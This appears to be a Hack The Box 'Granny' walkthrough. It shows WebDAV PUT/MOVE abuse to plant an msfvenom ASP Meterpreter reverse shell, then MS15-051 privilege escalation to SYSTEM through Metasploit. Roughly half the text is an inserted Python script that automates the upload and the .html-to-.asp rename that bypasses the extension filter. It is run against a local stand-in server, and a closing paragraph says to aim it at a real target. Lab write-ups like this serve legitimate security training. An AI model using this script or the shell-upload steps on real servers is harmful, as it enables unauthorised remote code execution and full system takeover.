
Hack The Box – Granny Walkthrough

Introduction

This was an easy Windows box that involved abusing the PUT and MOVE methods of the WebDAV extension to HTTP to upload a reverse shell and obtain remote access, and then exploiting a Windows kernel vulnerability in the win32k.sys kernel-mode driver (MS15-051) to escalate privileges to SYSTEM.

Enumeration

The first thing to do is to run a TCP Nmap scan against the 1000 most common ports, using the following flags:

  • -sC to run default scripts
  • -sV to enumerate applications versions
  • -Pn to skip the host discovery phase, as some hosts will not respond to ping requests
  • -oA to save the output in all formats available

The output of the default http-methods script shows that the PUT method is allowed, together with other WebDAV methods such as MOVE. This could be used to upload a web shell and obtain remote access to the machine.

Using davtest to check whether files can be uploaded to the web server. davtest attempts to PUT a test file with each of a range of extensions and reports which ones the server accepts and executes; executable extensions such as .asp are rejected, while harmless ones such as .html and .txt are accepted.

WebDAV Shell Upload Exploitation

Creating an ASP reverse shell with MSFvenom, saved with an .html extension so that the server accepts the upload, using the following flags:

  • -p to specify the payload type, in this case the Windows Meterpreter reverse shell
  • LHOST to specify the local host IP address to connect to
  • LPORT to specify the local port to connect to
  • -f to specify the format, in this case asp

Then uploading the file with the .html extension, which the server accepts, and using the WebDAV MOVE method to rename it to .asp, which the PUT filter never checks, so that IIS will execute it:
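The same upload-then-rename trick done by hand, as an added example that is not part of the original walkthrough (where the upload was done with cadaver/curl and shown as a screenshot). The in-process server below is a constructed stand-in for the target: it mimics an IIS 6 WebDAV share that advertises PUT and MOVE, refuses PUT of .asp/.aspx, but applies no extension check on MOVE. The OPTIONS probe returns the same information the Nmap http-methods script reports. Host, port, file names and the payload bytes are assumptions; against the real box the payload would be the msfvenom -f asp output.

```python
# Added example, not from the original walkthrough. The fake server is a
# constructed stand-in for an IIS 6 WebDAV share; names and payload are assumptions.
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlsplit

BLOCKED_PUT_EXTS = (".asp", ".aspx")   # extensions the stand-in refuses on PUT
OK = (200, 201, 204)                    # success codes a WebDAV server returns


class FakeDavHandler(BaseHTTPRequestHandler):
    """Minimal WebDAV-like server, constructed for this example only."""
    files = {}  # path -> bytes, shared across requests

    def log_message(self, *args):       # silence per-request logging
        pass

    def _reply(self, status, body=b"", **extra):
        self.send_response(status)
        for name, value in extra.items():
            self.send_header(name, value)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_OPTIONS(self):
        self._reply(200, Allow="OPTIONS, GET, HEAD, PUT, DELETE, MOVE, PROPFIND", DAV="1,2")

    def do_PUT(self):
        if self.path.lower().endswith(BLOCKED_PUT_EXTS):
            return self._reply(403)     # the filter davtest runs into
        body = self.rfile.read(int(self.headers.get("Content-Length", 0)))
        self.files[self.path] = body
        self._reply(201)

    def do_MOVE(self):
        dest = urlsplit(self.headers.get("Destination", "")).path
        if self.path not in self.files or not dest:
            return self._reply(404)
        self.files[dest] = self.files.pop(self.path)   # no extension check here
        self._reply(201)

    def do_GET(self):
        body = self.files.get(self.path)
        self._reply(404) if body is None else self._reply(200, body)


def start_stand_in():
    """Start the fake server on a free loopback port; returns (host, port)."""
    srv = HTTPServer(("127.0.0.1", 0), FakeDavHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv.server_address


def _request(host, port, method, path, body=None, headers=None):
    conn = http.client.HTTPConnection(host, port, timeout=5)
    conn.request(method, path, body=body, headers=headers or {})
    resp = conn.getresponse()
    data = resp.read()
    conn.close()
    return resp.status, resp.getheader("Allow", ""), data


def allowed_methods(host, port, path="/"):
    """OPTIONS probe: the same information Nmap's http-methods script reports."""
    _, allow, _ = _request(host, port, "OPTIONS", path)
    return {m.strip().upper() for m in allow.split(",") if m.strip()}


def put_file(host, port, path, body):
    return _request(host, port, "PUT", path, body=body)[0]


def move_file(host, port, src, dst):
    dest = f"http://{host}:{port}{dst}"
    return _request(host, port, "MOVE", src, headers={"Destination": dest})[0]


def fetch(host, port, path):
    status, _, data = _request(host, port, "GET", path)
    return status, data


def upload_shell(host, port, payload, stem="shell"):
    """Stage an ASP payload: try PUT as .asp; if refused, PUT as .html and MOVE to .asp."""
    methods = allowed_methods(host, port)
    if not {"PUT", "MOVE"} <= methods:
        return {"ok": False, "reason": "PUT/MOVE not advertised", "methods": methods}
    if put_file(host, port, f"/{stem}.asp", payload) in OK:
        return {"ok": True, "path": f"/{stem}.asp", "via": "direct PUT"}
    if put_file(host, port, f"/{stem}.html", payload) not in OK:
        return {"ok": False, "reason": "PUT of .html refused"}
    if move_file(host, port, f"/{stem}.html", f"/{stem}.asp") not in OK:
        return {"ok": False, "reason": "MOVE refused"}
    return {"ok": True, "path": f"/{stem}.asp", "via": "PUT as .html, then MOVE"}


if __name__ == "__main__":
    host, port = start_stand_in()
    # Constructed placeholder standing in for msfvenom's -f asp output.
    payload = b"<% Response.Write(\"placeholder\") %>"
    print(upload_shell(host, port, payload))
```

Against a real target, point `upload_shell` at the box instead of the stand-in and pass the msfvenom output as `payload`; the function first tries the direct PUT so that it also works on servers that never filtered the extension, and only falls back to the rename when the PUT is refused.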

Starting msfconsole, selecting the multi/handler module, setting the following options and running it (the handler only listens for the callback, so it takes no RHOST option):

  • payload to specify the payload type, which must match the one given to MSFvenom (here the Windows Meterpreter reverse TCP shell)
  • LHOST to specify the local host IP address to listen on
  • LPORT to specify the local port to listen on

Navigating to the .asp shell in a browser (or requesting it with curl) to trigger it

A callback was received, which granted a Meterpreter reverse shell.

Privilege Escalation

Migrating the Meterpreter session into a more stable process with the migrate command, so that the exploit modules run from a process that IIS will not recycle.

Running the Metasploit local exploit suggester module (post/multi/recon/local_exploit_suggester) to look for applicable privilege escalation exploits; all that is required is to set the SESSION option to the session to run the module against.

Selecting the ms15-051 Client Copy Image exploit (exploit/windows/local/ms15_051_client_copy_image), setting the following options and running the module. As a local exploit it runs through the existing session, so it takes no RHOST option:

  • SESSION to specify the Meterpreter session to run the module against
  • LHOST to specify the local host IP address for the new session to connect back to
  • LPORT to specify the local port for the new session to connect back to

This exploit worked and granted a shell running as NT AUTHORITY\SYSTEM.

Conclusion

This was a fairly easy box and, even though it doesn’t necessarily bring anything new to the table, it allows practising WebDAV exploitation and Windows kernel exploits, and overall it’s a pretty good machine.